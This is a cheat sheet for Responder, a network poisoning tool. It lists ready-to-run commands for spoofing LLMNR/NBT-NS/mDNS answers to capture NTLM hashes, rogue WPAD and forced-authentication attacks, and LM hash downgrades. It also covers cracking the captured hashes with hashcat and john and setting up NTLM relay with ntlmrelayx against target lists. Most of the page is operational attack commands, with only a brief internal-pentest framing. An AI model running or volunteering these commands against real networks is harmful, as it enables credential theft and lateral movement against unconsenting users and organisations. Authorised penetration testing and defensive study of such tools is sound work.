← Cheat Sheets / Network

responder

LLMNR/NBT-NS/mDNS poisoner for credential capture.

Quickstart

# Start responder on interface
sudo responder -I eth0

# Analyze mode (passive)
sudo responder -I eth0 -A

# With WPAD
sudo responder -I eth0 -wF

Core Concepts

Concept Description
LLMNR Link-Local Multicast Name Resolution
NBT-NS NetBIOS Name Service
mDNS Multicast DNS
Poisoning Answer queries to capture hashes

Syntax

sudo responder -I <interface> [options]

Options

Interface

Option Description
-I <iface> Network interface
-i <ip> Local IP (if not auto)

Modes

Option Description
-A Analyze mode (passive)
-w WPAD rogue server
-F Force WPAD auth
-P Force proxy auth
-b Return basic HTTP auth

Servers

Option Description
-r Respond to netbios wredir
-d Enable DHCP responses
-D DHCP domain
-f Fingerprint hosts

Protocols

Option Description
--lm Force LM hashing
--disable-ess Disable ESS

Logging

Option Description
-v Verbose
-e <ip> External IP (NAT)

Recipes

Basic Poisoning

# Start on interface
sudo responder -I eth0

# With verbose
sudo responder -I eth0 -v

# Analyze only (no poisoning)
sudo responder -I eth0 -A

WPAD Attack

# Enable WPAD
sudo responder -I eth0 -w

# Force WPAD authentication
sudo responder -I eth0 -wF

# Full WPAD attack
sudo responder -I eth0 -wFP

Capture NTLMv2

# Standard capture
sudo responder -I eth0

# Hashes saved to:
# /usr/share/responder/logs/

Force LM Hashes

# Downgrade to LM (older systems)
sudo responder -I eth0 --lm

Specific Network

# Specify local IP
sudo responder -I eth0 -i 192.168.1.100

With DHCP

# DHCP responses
sudo responder -I eth0 -d

# DHCP with domain
sudo responder -I eth0 -d -D target.local

Fingerprinting

# Fingerprint hosts
sudo responder -I eth0 -f

Hash Cracking

# Find captured hashes
ls /usr/share/responder/logs/

# Crack with hashcat (NTLMv2)
hashcat -m 5600 hashes.txt wordlist.txt

# Crack with john
john --format=netntlmv2 hashes.txt

Configuration

# Config file
sudo nano /usr/share/responder/Responder.conf

# Enable/disable servers:
# SQL = On
# SMB = On
# HTTP = On
# HTTPS = On
# etc.

Common Scenarios

Internal Pentest

# Passive recon first
sudo responder -I eth0 -A

# Then active poisoning
sudo responder -I eth0 -wFPv

Relay Attack Prep

# Disable SMB and HTTP for relay
# Edit Responder.conf:
# SMB = Off
# HTTP = Off

sudo responder -I eth0
# Then use ntlmrelayx

MultiRelay

# Start responder without SMB
sudo responder -I eth0 --disable-ess

# Use with ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

Output & Parsing

# View logs
cat /usr/share/responder/logs/*NTLM*

# Extract hashes for cracking
cat /usr/share/responder/logs/*NTLMv2* | sort -u > hashes.txt

# Monitor in real-time
tail -f /usr/share/responder/logs/Responder-Session.log

Troubleshooting

Issue Solution
No hashes Check interface, network
Port in use Stop conflicting services
Permission denied Run with sudo
No traffic Verify same subnet

References

← Retour aux cheat sheets